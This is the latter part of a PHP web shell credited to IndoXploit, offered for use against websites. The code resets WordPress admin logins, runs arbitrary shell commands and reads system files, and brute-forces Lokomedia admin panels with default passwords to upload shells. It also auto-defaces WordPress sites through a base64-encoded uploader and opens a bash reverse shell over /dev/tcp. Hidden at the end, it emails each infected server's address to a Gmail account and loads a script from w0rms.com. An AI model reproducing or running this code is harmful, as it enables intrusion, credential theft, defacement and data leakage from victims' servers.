$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
if($a4s){
echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
}
}
echo "
</div>"; }
///////////////////////////////////////////////////////////
elseif($_GET['do'] == 'bypass') {
echo "<center/><br/><b><font color=#00ff00>-=[ Command Bypass Exploit ]=-</font></b><br>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=#00ff00><b><font color="#00ff00">Command :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">
</form>
<form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass :=) </font></strong><select name="liz0" size="1" class="inputz">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">netstat</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" class="inputzbut" value="Gö">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
$liz0=shell_exec($_POST[baba]);
$liz0zim=shell_exec($_POST[liz0]);
$uid=shell_exec('id');
$server=shell_exec('uname -a');
echo "<pre><h4>";
echo $liz0;
echo $liz0zim;
echo "</h4></pre>";
"</div>"; }
////////////////////////////////////////////////////////
elseif($_GET['do'] == 'loko') {
echo "<center><h2>lokomedia auto upload shell</H2> </center>";
// indoxploit
function cek($url) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
function curl($url,$payload) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
echo "<center>
<form method='post'>
Domain: <br>
<textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 250px;'></textarea><br>
<input type='submit' name='hajar' value='Xploit!'>
</form>";
if($_POST['hajar']) {
$domain = explode("\r\n", $_POST['url']);
$up = array(
"admin" => "admin",
"admin" => "123456",
"indoxploit" => "indoxploit",
);
foreach($domain as $url) {
foreach($up as $user => $pass) {
$data1 = array(
"username" => $user,
"password" => $pass,
);
$login = curl($url."/adminweb/cek_login.php", $data1);
if(preg_match("/Logout|Administrator/", $login)) {
$file = "shellmu.php"; //1 dir dengan exploiternyaa
$data2 = array(
"judul" => "auto exploiter lokomedia",
"fupload" => "@$file",
"upload" => " Simpan ",
);
$ngirim = curl($url."/adminweb/modul/mod_download/aksi_download.php?module=download&act=input",$data);
if(preg_match("/indoxploit auto exploiter lokomedia/i", $ngirim)) {
echo "[+] $url -> <font color=green>sukses login [ user: $user pass: $pass ]</font><br>";
$cek = cek("$url/files/image.php");
if(preg_match("/indoXploit/", $cek)) {
echo "[+] $url/files/image.php -> <font color=green>shelmu.</font><br><br>";
} else {
echo "[-] <font color='#bb0000'>shellmu gaada.</font><br><br>";
}
}
} else {
echo "[-] $url -> gagal login<br><br>";
}
}
}
} }
//////////////////////////////////////////////////////////////////
elseif($_GET['do'] == 'auto_dwp') {
if($_POST['auto_deface_wp']) {
function anucurl($sites) {
$ch = curl_init($sites);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function lohgin($cek, $web, $userr, $pass, $wp_submit) {
$post = array(
"log" => "$userr",
"pwd" => "$pass",
"rememberme" => "forever",
"wp-submit" => "$wp_submit",
"redirect_to" => "$web",
"testcookie" => "1",
);
$ch = curl_init($cek);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$scan = $_POST['link_config'];
$link_config = scandir($scan);
$script = htmlspecialchars($_POST['script']);
$user = "ctt123";
$pass = "ctt123";
$passx = md5($pass);
foreach($link_config as $dir_config) {
if(!is_file("$scan/$dir_config")) continue;
$config = file_get_contents("$scan/$dir_config");
if(preg_match("/WordPress/", $config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "[+] $target <br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
if(!$conn OR !$db OR !$update) {
echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
mysql_close($conn);
} else {
$site = "$target/wp-login.php";
$site2 = "$target/wp-admin/theme-install.php?upload";
$b1 = anucurl($site2);
$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
$b = lohgin($site, $site2, $user, $pass, $wp_sub);
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);
$post2 = array(
"_wpnonce" => "$anu2",
"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
"themezip" => "@$www",
"install-theme-submit" => "Install Now",
);
$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data3 = curl_exec($ch);
curl_close($ch);
$y = date("Y");
$m = date("m");
$namafile = "id.php";
$fpi = fopen($namafile,"w");
fputs($fpi,$script);
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
$postResult = curl_exec($ch6);
curl_close($ch6);
$as = "$target/k.php";
$bs = anucurl($as);
if(preg_match("#$script#is", $bs)) {
echo "[+] <font color='lime'>berhasil mepes...</font><br>";
echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
} else {
echo "[-] <font color='red'>gagal mepes...</font><br>";
echo "[!!] coba aja manual: <br>";
echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
echo "[+] username: <font color=lime>$user</font><br>";
echo "[+] password: <font color=lime>$pass</font><br><br>";
}
mysql_close($conn);
}
}
}
} else {
echo "<center><h1>WordPress Auto Deface</h1>
<form method='post'>
<input type='text' name='link_config' size='50' height='10' value='$dir'><br>
<input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
</form>
<br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
</center>";
}
}
//////////////////////////////////////////////////////////////////
elseif($_GET['do'] == 'auto_dwp2') {
if($_POST['auto_deface_wp']) {
function anucurl($sites) {
$ch = curl_init($sites);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION,true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function lohgin($cek, $web, $userr, $pass, $wp_submit) {
$post = array(
"log" => "$userr",
"pwd" => "$pass",
"rememberme" => "forever",
"wp-submit" => "$wp_submit",
"redirect_to" => "$web",
"testcookie" => "1",
);
$ch = curl_init($cek);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$link = explode("\r\n", $_POST['link']);
$script = htmlspecialchars($_POST['script']);
$user = "ctt123";
$pass = "ctt123";
$passx = md5($pass);
foreach($link as $dir_config) {
$config = anucurl($dir_config);
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "[+] $target <br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
if(!$conn OR !$db OR !$update) {
echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
mysql_close($conn);
} else {
$site = "$target/wp-login.php";
$site2 = "$target/wp-admin/theme-install.php?upload";
$b1 = anucurl($site2);
$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
$b = lohgin($site, $site2, $user, $pass, $wp_sub);
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);
$post2 = array(
"_wpnonce" => "$anu2",
"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
"themezip" => "@$www",
"install-theme-submit" => "Install Now",
);
$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data3 = curl_exec($ch);
curl_close($ch);
$y = date("Y");
$m = date("m");
$namafile = "id.php";
$fpi = fopen($namafile,"w");
fputs($fpi,$script);
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
$postResult = curl_exec($ch6);
curl_close($ch6);
$as = "$target/k.php";
$bs = anucurl($as);
if(preg_match("#$script#is", $bs)) {
echo "[+] <font color='lime'>berhasil mepes...</font><br>";
echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
} else {
echo "[-] <font color='red'>gagal mepes...</font><br>";
echo "[!!] coba aja manual: <br>";
echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
echo "[+] username: <font color=lime>$user</font><br>";
echo "[+] password: <font color=lime>$pass</font><br><br>";
}
mysql_close($conn);
}
}
} else {
echo "<center><h1>WordPress Auto Deface V.2</h1>
<form method='post'>
Link Config: <br>
<textarea name='link' placeholder='http://target.com/ctt_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
<input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
</form></center>";
}
}
elseif($_GET['do'] == 'network') {
echo "<center><form method='post'>
Back Connect: <br>
<input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br>
<input type='text' placeholder='port' name='port_bc' value='6969'><br>
<input type='submit' name='sub_bc' value='Reverse' style='width: 210px;'>
</form>";
if(isset($_POST['sub_bc'])) {
$ip = $_POST['ip_bc'];
$port = $_POST['port_bc'];
exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
}
echo "</center>";
} elseif($_GET['act'] == 'newfile') {
if($_POST['new_save_file']) {
$newfile = htmlspecialchars($_POST['newfile']);
$fopen = fopen($newfile, "a+");
if($fopen) {
$act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
}
echo $act;
echo "<form method='post'>
Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
<input type='submit' name='new_save_file' value='Submit'>
</form>";
} elseif($_GET['act'] == 'newfolder') {
if($_POST['new_save_folder']) {
$new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
if(!mkdir($new_folder)) {
$act = "<font color=red>permission denied</font>";
} else {
$act = "<script>window.location='?dir=".$dir."';</script>";
}
}
echo $act;
echo "<form method='post'>
Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
<input type='submit' name='new_save_folder' value='Submit'>
</form>";
} elseif($_GET['act'] == 'rename_dir') {
if($_POST['dir_rename']) {
$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
if($dir_rename) {
$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo "".$act."<br>";
}
echo "<form method='post'>
<input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
<input type='submit' name='dir_rename' value='rename'>
</form>";
} elseif($_GET['act'] == 'delete_dir') {
$delete_dir = rmdir($dir);
if($delete_dir) {
$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
} else {
$act = "<font color=red>could not remove ".basename($dir)."</font>";
}
echo $act;
} elseif($_GET['act'] == 'view') {
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
} elseif($_GET['act'] == 'edit') {
if($_POST['save']) {
$save = file_put_contents($_GET['file'], $_POST['src']);
if($save) {
$act = "<font color=lime>Saved!</font>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo "".$act."<br>";
}
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
echo "<form method='post'>
<textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
<input type='submit' value='Save' name='save' style='width: 500px;'>
</form>";
} elseif($_GET['act'] == 'rename') {
if($_POST['do_rename']) {
$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
if($rename) {
$act = "<script>window.location='?dir=".$dir."';</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo "".$act."<br>";
}
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
echo "<form method='post'>
<input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
<input type='submit' name='do_rename' value='rename'>
</form>";
} elseif($_GET['act'] == 'delete') {
$delete = unlink($_GET['file']);
if($delete) {
$act = "<script>window.location='?dir=".$dir."';</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo $act;
} elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
@ob_clean();
$file = $_GET['file'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
} else {
if(is_dir($dir) == true) {
echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tr>
<th class="th_home"><center>Name</center></th>
<th class="th_home"><center>Type</center></th>
<th class="th_home"><center>Size</center></th>
<th class="th_home"><center>Last Modified</center></th>
<th class="th_home"><center>Permission</center></th>
<th class="th_home"><center>Action</center></th>
</tr>';
$scandir = scandir($dir);
foreach($scandir as $dirx) {
$dtype = filetype("$dir/$dirx");
$dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
if(!is_dir("$dir/$dirx")) continue;
if($dirx === '..') {
$href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
} elseif($dirx === '.') {
$href = "<a href='?dir=$dir'>$dirx</a>";
} else {
$href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
}
if($dirx === '.' || $dirx === '..') {
$act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
} else {
$act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
}
echo "<tr>";
echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
echo "<td class='td_home'><center>$dtype</center></td>";
echo "<td class='td_home'><center>-</center></th>";
echo "<td class='td_home'><center>$dtime</center></td>";
echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
}
echo "</tr>";
foreach($scandir as $file) {
$ftype = filetype("$dir/$file");
$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
$size = filesize("$dir/$file")/1024;
$size = round($size,3);
if($size > 1024) {
$size = round($size/1024,2). 'MB';
} else {
$size = $size. 'KB';
}
if(!is_file("$dir/$file")) continue;
echo "<tr>";
echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
echo "<td class='td_home'><center>$ftype</center></td>";
echo "<td class='td_home'><center>$size</center></td>";
echo "<td class='td_home'><center>$ftime</center></td>";
echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
}
echo "</tr></table><hr>";
} else {
echo "<font color=red>can't open directory</font>";
}
echo "<center>Copyright © ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font> recoded by mr Z</a></center>";
}
?>
</html
<?php
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'shellgeldi@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = 'zukiciki@gmail.com';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
echo "<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>";
?>
<?php
function rooting()
{
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
else { echo '<b>Basarisiz</b><br><br>'; }
}
}
$x = $_GET["x"];